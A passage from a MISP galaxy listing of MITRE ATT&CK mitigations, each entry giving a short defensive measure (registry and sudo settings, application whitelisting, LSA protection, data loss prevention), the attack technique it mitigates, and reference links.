The tag is: misp-galaxy:mitre-course-of-action="User Execution Mitigation - T1204"

User Execution Mitigation - T1204 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="User Execution - T1204" with estimative-language:likelihood-probability="almost-certain"

Table 6599. Table References

Links

https://attack.mitre.org/mitigations/T1204

Restrict Registry Permissions - M1024

Restrict the ability to modify certain hives or keys in the Windows Registry.

The tag is: misp-galaxy:mitre-course-of-action="Restrict Registry Permissions - M1024"

Table 6600. Table References

Links

https://attack.mitre.org/mitigations/M1024

User Account Control - M1052

Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.

The tag is: misp-galaxy:mitre-course-of-action="User Account Control - M1052"

Table 6601. Table References

Links

https://attack.mitre.org/mitigations/M1052

Privileged Process Integrity - M1025

Protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures.

The tag is: misp-galaxy:mitre-course-of-action="Privileged Process Integrity - M1025"

Table 6602. Table References

Links

https://attack.mitre.org/mitigations/M1025

Port Knocking Mitigation - T1205

Mitigation of some variants of this technique could be achieved through the use of stateful firewalls, depending upon how it is implemented.

The tag is: misp-galaxy:mitre-course-of-action="Port Knocking Mitigation - T1205"

Port Knocking Mitigation - T1205 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Traffic Signaling - T1205" with estimative-language:likelihood-probability="almost-certain"

Table 6603. Table References

Links

https://attack.mitre.org/mitigations/T1205

Privileged Account Management - M1026

Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.

The tag is: misp-galaxy:mitre-course-of-action="Privileged Account Management - M1026"

Table 6604. Table References

Links

https://attack.mitre.org/mitigations/M1026

Multiband Communication Mitigation - T1026

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Multiband Communication Mitigation - T1026"

Multiband Communication Mitigation - T1026 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Multiband Communication - T1026" with estimative-language:likelihood-probability="almost-certain"

Table 6605. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/mitigations/T1026

Sudo Caching Mitigation - T1206

Setting the <code>timestamp_timeout</code> to 0 will require the user to input their password every time <code>sudo</code> is executed. Similarly, ensuring that the <code>tty_tickets</code> setting is enabled will prevent this leakage across tty sessions.

The tag is: misp-galaxy:mitre-course-of-action="Sudo Caching Mitigation - T1206"

Sudo Caching Mitigation - T1206 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Sudo Caching - T1206" with estimative-language:likelihood-probability="almost-certain"

Table 6606. Table References

Links

https://attack.mitre.org/mitigations/T1206

Operating System Configuration - M1028

Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.

The tag is: misp-galaxy:mitre-course-of-action="Operating System Configuration - M1028"

Table 6607. Table References

Links

https://attack.mitre.org/mitigations/M1028

Remote Data Storage - M1029

Use remote security log and sensitive file storage where access can be controlled better to prevent exposure of intrusion detection log data or sensitive information.

The tag is: misp-galaxy:mitre-course-of-action="Remote Data Storage - M1029"

Table 6608. Table References

Links

https://attack.mitre.org/mitigations/M1029

Time Providers Mitigation - T1209

Identify and block potentially malicious software that may be executed as a time provider by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown DLLs.

Consider using Group Policy to configure and block subsequent modifications to W32Time parameters. (Citation: Microsoft W32Time May 2017)

The tag is: misp-galaxy:mitre-course-of-action="Time Providers Mitigation - T1209"

Time Providers Mitigation - T1209 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Time Providers - T1209" with estimative-language:likelihood-probability="almost-certain"

Table 6609. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1209

https://docs.microsoft.com/windows-server/networking/windows-time-service/windows-time-service-tools-and-settings

Scheduled Transfer Mitigation - T1029

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary command and control infrastructure and malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool command and control signatures over time or construct protocols in such a way to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Scheduled Transfer Mitigation - T1029"

Scheduled Transfer Mitigation - T1029 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Scheduled Transfer - T1029" with estimative-language:likelihood-probability="almost-certain"

Table 6610. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/mitigations/T1029

Limit Software Installation - M1033

Block users or groups from installing unapproved software.

The tag is: misp-galaxy:mitre-course-of-action="Limit Software Installation - M1033"

Table 6611. Table References

Links

https://attack.mitre.org/mitigations/M1033

Credential Access Protection - M1043

Use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.

The tag is: misp-galaxy:mitre-course-of-action="Credential Access Protection - M1043"

Table 6612. Table References

Links

https://attack.mitre.org/mitigations/M1043

Limit Hardware Installation - M1034

Block users or groups from installing or using unapproved hardware on systems, including USB devices.

The tag is: misp-galaxy:mitre-course-of-action="Limit Hardware Installation - M1034"

Table 6613. Table References

Links

https://attack.mitre.org/mitigations/M1034

Path Interception Mitigation - T1034

Eliminate path interception weaknesses in program configuration files, scripts, the PATH environment variable, services, and in shortcuts by surrounding PATH variables with quotation marks when functions allow for them (Citation: Microsoft CreateProcess). Be aware of the search order Windows uses for executing or loading binaries and use fully qualified paths wherever appropriate (Citation: MSDN DLL Security). Clean up old Windows Registry keys when software is uninstalled to avoid keys with no associated legitimate binaries.

Periodically search for and correct or report path interception weaknesses on systems that may have been introduced using custom or available tools that report software using insecure path configurations (Citation: Kanthak Sentinel).

Require that all executables be placed in write-protected directories. Ensure that proper permissions and directory access control are set to deny users the ability to write files to the top-level directory <code>C:</code> and system directories, such as <code>C:\Windows\</code>, to reduce places where malicious files could be placed for execution.

Identify and block potentially malicious software that may be executed through the path interception by using whitelisting (Citation: Beechey 2010) tools, like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies, (Citation: Corio 2008) that are capable of auditing and/or blocking unknown executables.

The tag is: misp-galaxy:mitre-course-of-action="Path Interception Mitigation - T1034"

Path Interception Mitigation - T1034 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Path Interception - T1034" with estimative-language:likelihood-probability="almost-certain"

Table 6614. Table References

Links

http://msdn.microsoft.com/en-us/library/ms682425

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1034

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://msdn.microsoft.com/en-us/library/ff919712.aspx

https://skanthak.homepage.t-online.de/sentinel.html

Service Execution Mitigation - T1035

Ensure that permissions disallow services that run at a higher permissions level from being created or interacted with by a user with a lower permission level. Also ensure that high permission level service binaries cannot be replaced or modified by users with a lower permission level.

Identify unnecessary system utilities or potentially malicious software that may be used to interact with Windows services, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Service Execution Mitigation - T1035"

Service Execution Mitigation - T1035 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Service Execution - T1035" with estimative-language:likelihood-probability="almost-certain"

Table 6615. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1035

https://technet.microsoft.com/en-us/library/ee791851.aspx

Scheduled Task Mitigation - T1053

Limit privileges of user accounts and remediate Privilege Escalation vectors so only authorized administrators can create scheduled tasks on remote systems. Toolkits like the PowerSploit framework contain PowerUp modules that can be used to explore systems for permission weaknesses in scheduled tasks that could be used to escalate privileges. (Citation: Powersploit)

Configure settings for scheduled tasks to force tasks to run under the context of the authenticated account instead of allowing them to run as SYSTEM. The associated Registry key is located at <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\SubmitControl</code>. The setting can be configured through GPO: Computer Configuration > [Policies] > Windows Settings > Security Settings > Local Policies > Security Options: Domain Controller: Allow server operators to schedule tasks, set to disabled. (Citation: TechNet Server Operator Scheduled Task)

Configure the Increase Scheduling Priority option to only allow the Administrators group the rights to schedule a priority process. This can be can be configured through GPO: Computer Configuration > [Policies] > Windows Settings > Security Settings > Local Policies > User Rights Assignment: Increase scheduling priority. (Citation: TechNet Scheduling Priority)

Identify and block unnecessary system utilities or potentially malicious software that may be used to schedule tasks using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Scheduled Task Mitigation - T1053"

Scheduled Task Mitigation - T1053 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Scheduled Task/Job - T1053" with estimative-language:likelihood-probability="almost-certain"

Table 6616. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1053

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://github.com/mattifestation/PowerSploit

https://technet.microsoft.com/en-us/library/ee791851.aspx

https://technet.microsoft.com/library/dn221960.aspx

https://technet.microsoft.com/library/jj852168.aspx

Account Use Policies - M1036

Configure features related to account use like login attempt lockouts, specific login times, etc.

The tag is: misp-galaxy:mitre-course-of-action="Account Use Policies - M1036"

Table 6617. Table References

Links

https://attack.mitre.org/mitigations/M1036

Filter Network Traffic - M1037

Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.

The tag is: misp-galaxy:mitre-course-of-action="Filter Network Traffic - M1037"

Table 6618. Table References

Links

https://attack.mitre.org/mitigations/M1037

Logon Scripts Mitigation - T1037

Restrict write access to logon scripts to specific administrators. Prevent access to administrator accounts by mitigating Credential Access techniques and limiting account access and permissions of [Valid Accounts](https://attack.mitre.org/techniques/T1078).

Identify and block potentially malicious software that may be executed through logon script modification by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown programs.

The tag is: misp-galaxy:mitre-course-of-action="Logon Scripts Mitigation - T1037"

Logon Scripts Mitigation - T1037 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Boot or Logon Initialization Scripts - T1037" with estimative-language:likelihood-probability="almost-certain"

Table 6619. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1037

Environment Variable Permissions - M1039

Prevent modification of environment variables by unauthorized users and groups.

The tag is: misp-galaxy:mitre-course-of-action="Environment Variable Permissions - M1039"

Table 6620. Table References

Links

https://attack.mitre.org/mitigations/M1039

Process Hollowing Mitigation - T1093

This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of operating system design features. For example, mitigating specific API calls will likely have unintended side effects, such as preventing legitimate software (i.e., security products) from operating properly. Efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior.

Although process hollowing may be used to evade certain types of defenses, it is still good practice to identify potentially malicious software that may be used to perform adversarial actions and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Process Hollowing Mitigation - T1093"

Process Hollowing Mitigation - T1093 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Process Hollowing - T1093" with estimative-language:likelihood-probability="almost-certain"

Table 6621. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1093

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/ee791851.aspx

Restrict Library Loading - M1044

Prevent abuse of library loading mechanisms in the operating system and software to load untrusted code by configuring appropriate library loading mechanisms and investigating potential vulnerable software.

The tag is: misp-galaxy:mitre-course-of-action="Restrict Library Loading - M1044"

Table 6622. Table References

Links

https://attack.mitre.org/mitigations/M1044

Indicator Blocking Mitigation - T1054

Ensure event tracers/forwarders (Citation: Microsoft ETW May 2018), firewall policies, and other associated mechanisms are secured with appropriate permissions and access controls. Consider automatically relaunching forwarding mechanisms at recurring intervals (ex: temporal, on-logon, etc.) as well as applying appropriate change management to firewall rules and other related system configurations.

The tag is: misp-galaxy:mitre-course-of-action="Indicator Blocking Mitigation - T1054"

Table 6623. Table References

Links

https://attack.mitre.org/mitigations/T1054

https://docs.microsoft.com/windows/desktop/etw/event-tracing-portal

Software Packing Mitigation - T1045

Ensure updated virus definitions. Create custom signatures for observed malware. Employ heuristic-based malware detection.

Identify and prevent execution of potentially malicious software that may have been packed by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Software Packing Mitigation - T1045"

Software Packing Mitigation - T1045 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Software Packing - T1045" with estimative-language:likelihood-probability="almost-certain"

Table 6624. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1045

https://technet.microsoft.com/en-us/library/ee791851.aspx

Data Staged Mitigation - T1074

Identify system utilities, remote access or third-party tools, users or potentially malicious software that may be used to store compressed or encrypted data in a publicly writeable directory, central location, or commonly used staging directories (e.g. recycle bin) that is indicative of non-standard behavior, and audit and/or block them by using file integrity monitoring tools where appropriate. Consider applying data size limits or blocking file writes of common compression and encryption utilities such as 7zip, RAR, ZIP, or zlib on frequently used staging directories or central locations and monitor attempted violations of those restrictions.

The tag is: misp-galaxy:mitre-course-of-action="Data Staged Mitigation - T1074"

Data Staged Mitigation - T1074 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Data Staged - T1074" with estimative-language:likelihood-probability="almost-certain"

Table 6625. Table References

Links

https://attack.mitre.org/mitigations/T1074

Environmental Keying Mitigation - T1480

This technique likely should not be mitigated with preventative controls because it may protect unintended targets from being compromised. If targeted, efforts should be focused on preventing adversary tools from running earlier in the chain of activity and on identifying subsequent malicious behavior if compromised.

The tag is: misp-galaxy:mitre-course-of-action="Environmental Keying Mitigation - T1480"

Table 6626. Table References

Links

https://attack.mitre.org/mitigations/T1480

Do Not Mitigate - M1055

This category is to associate techniques that mitigation might increase risk of compromise and therefore mitigation is not recommended.

The tag is: misp-galaxy:mitre-course-of-action="Do Not Mitigate - M1055"

Table 6627. Table References

Links

https://attack.mitre.org/mitigations/M1055

Data Loss Prevention - M1057

Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention)

The tag is: misp-galaxy:mitre-course-of-action="Data Loss Prevention - M1057"

Table 6628. Table References

Links

https://attack.mitre.org/mitigations/M1057

https://purplesec.us/data-loss-prevention/

Process Discovery Mitigation - T1057

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about processes, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Process Discovery Mitigation - T1057"

Process Discovery Mitigation - T1057 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Process Discovery - T1057" with estimative-language:likelihood-probability="almost-certain"

Table 6629. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1057

https://technet.microsoft.com/en-us/library/ee791851.aspx

Account Discovery Mitigation - T1087

Prevent administrator accounts from being enumerated when an application is elevating through UAC since it can lead to the disclosure of account names. The Registry key is located <code>HKLM\ SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\CredUI\EnumerateAdministrators</code>. It can be disabled through GPO: Computer Configuration > [Policies] > Administrative Templates > Windows Components > Credential User Interface: E numerate administrator accounts on elevation. (Citation: UCF STIG Elevation Account Enumeration)

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information about system and domain accounts, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Account Discovery Mitigation - T1087"

Account Discovery Mitigation - T1087 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Account Discovery - T1087" with estimative-language:likelihood-probability="almost-certain"

Table 6630. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1087

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/ee791851.aspx

https://www.stigviewer.com/stig/microsoft_windows_server_2012_member_server/2013-07-25/finding/WN12-CC-000077

Valid Accounts Mitigation - T1078

Take measures to detect or prevent techniques such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or installation of keyloggers to acquire credentials through [Input Capture](https://attack.mitre.org/techniques/T1056). Limit credential overlap across systems to prevent access if account credentials are obtained. Ensure that local administrator accounts have complex, unique passwords across all systems on the network. Do not put user or admin domain accounts in the local administrator groups across systems unless they are tightly controlled and use of accounts is segmented, as this is often equivalent to having a local administrator account with the same password on all systems.

Follow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers. (Citation: Microsoft Securing Privileged Access)

Audit domain and local accounts as well as their permission levels routinely to look for situations that could allow an adversary to gain wide access by obtaining credentials of a privileged account. (Citation: TechNet Credential Theft) (Citation: TechNet Least Privilege) These audits should also include if default accounts have been enabled, or if new local accounts are created that have not be authorized.

Applications and appliances that utilize default username and password should be changed immediately after the installation, and before deployment to a production environment. (Citation: US-CERT Alert TA13-175A Risks of Default Passwords on the Internet) When possible, applications that use SSH keys should be updated periodically and properly secured.

The tag is: misp-galaxy:mitre-course-of-action="Valid Accounts Mitigation - T1078"

Valid Accounts Mitigation - T1078 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 6631. Table References

Links

https://attack.mitre.org/mitigations/T1078

https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material#a-nameesaebmaesae-administrative-forest-design-approach

https://technet.microsoft.com/en-us/library/dn487450.aspx

https://technet.microsoft.com/en-us/library/dn535501.aspx

https://www.us-cert.gov/ncas/alerts/TA13-175A

Multilayer Encryption Mitigation - T1079

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Use of encryption protocols may make typical network-based C2 detection more difficult due to a reduced ability to signature the traffic. Prior knowledge of adversary C2 infrastructure may be useful for domain and IP address blocking, but will likely not be an effective long-term solution because adversaries can change infrastructure often. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Multilayer Encryption Mitigation - T1079"

Multilayer Encryption Mitigation - T1079 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Multilayer Encryption - T1079" with estimative-language:likelihood-probability="almost-certain"

Table 6632. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/mitigations/T1079

Modify Registry Mitigation - T1112

Misconfiguration of permissions in the Registry may lead to opportunities for an adversary to execute code, like through [Service Registry Permissions Weakness](https://attack.mitre.org/techniques/T1058). Ensure proper permissions are set for Registry hives to prevent users from modifying keys for system components that may lead to privilege escalation.

Identify and block unnecessary system utilities or potentially malicious software that may be used to modify the Registry by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Modify Registry Mitigation - T1112"

Modify Registry Mitigation - T1112 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 6633. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1112

https://technet.microsoft.com/en-us/library/ee791851.aspx

Authentication Package Mitigation - T1131

Windows 8.1, Windows Server 2012 R2, and later versions, may make LSA run as a Protected Process Light (PPL) by setting the Registry key <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL</code>, which requires all DLLs loaded by LSA to be signed by Microsoft. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)

The tag is: misp-galaxy:mitre-course-of-action="Authentication Package Mitigation - T1131"

Authentication Package Mitigation - T1131 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Authentication Package - T1131" with estimative-language:likelihood-probability="almost-certain"

Table 6634. Table References

Links

http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html

https://attack.mitre.org/mitigations/T1131

https://technet.microsoft.com/en-us/library/dn408187.aspx

Screen Capture Mitigation - T1113

Blocking software based on screen capture functionality may be difficult, and there may be legitimate software that performs those actions. Instead, identify potentially malicious software that may have functionality to acquire screen captures, and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Screen Capture Mitigation - T1113"

Screen Capture Mitigation - T1113 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"

Table 6635. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1113

https://technet.microsoft.com/en-us/library/ee791851.aspx

Email Collection Mitigation - T1114

Use of encryption provides an added layer of security to sensitive information sent over email. Encryption using public key cryptography requires the adversary to obtain the private certificate along with an encryption key to decrypt messages.

Use of two-factor authentication for public-facing webmail servers is also a recommended best practice to minimize the usefulness of user names and passwords to adversaries.

Identify unnecessary system utilities or potentially malicious software that may be used to collect email data files or access the corporate email server, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Email Collection Mitigation - T1114"

Email Collection Mitigation - T1114 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Email Collection - T1114" with estimative-language:likelihood-probability="almost-certain"

Table 6636. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1114

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/ee791851.aspx

Input Prompt Mitigation - T1141

This technique exploits users' tendencies to always supply credentials when prompted, which makes it very difficult to mitigate. Use user training as a way to bring awareness and raise suspicion for potentially malicious events (ex: Office documents prompting for credentials).

The tag is: misp-galaxy:mitre-course-of-action="Input Prompt Mitigation - T1141"

Input Prompt Mitigation - T1141 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Input Prompt - T1141" with estimative-language:likelihood-probability="almost-certain"

Table 6637. Table References

Links

https://attack.mitre.org/mitigations/T1141

Clipboard Data Mitigation - T1115

Instead of blocking software based on clipboard capture behavior, identify potentially malicious software that may contain this functionality, and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Clipboard Data Mitigation - T1115"

Clipboard Data Mitigation - T1115 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"

Table 6638. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1115

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/ee791851.aspx

LC_LOAD_DYLIB Addition Mitigation - T1161

Enforce that all binaries be signed by the correct Apple Developer IDs, and whitelist applications via known hashes. Binaries can also be baselined for what dynamic libraries they require, and if an app requires a new dynamic library that wasn’t included as part of an update, it should be investigated.

The tag is: misp-galaxy:mitre-course-of-action="LC_LOAD_DYLIB Addition Mitigation - T1161"

LC_LOAD_DYLIB Addition Mitigation - T1161 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="LC_LOAD_DYLIB Addition - T1161" with estimative-language:likelihood-probability="almost-certain"

Table 6639. Table References

Links

https://attack.mitre.org/mitigations/T1161

Code Signing Mitigation - T1116

Process whitelisting and trusted publishers to verify authenticity of software can help prevent signed malicious or untrusted code from executing on a system. (Citation: NSA MS AppLocker) (Citation: TechNet Trusted Publishers) (Citation: Securelist Digital Certificates)

The tag is: misp-galaxy:mitre-course-of-action="Code Signing Mitigation - T1116"

Code Signing Mitigation - T1116 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Code Signing - T1116" with estimative-language:likelihood-probability="almost-certain"

Table 6640. Table References

Links

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1116

https://securelist.com/why-you-shouldnt-completely-trust-files-signed-with-digital-certificates/68593/

https://technet.microsoft.com/en-us/library/cc733026.aspx

Automated Collection Mitigation - T1119

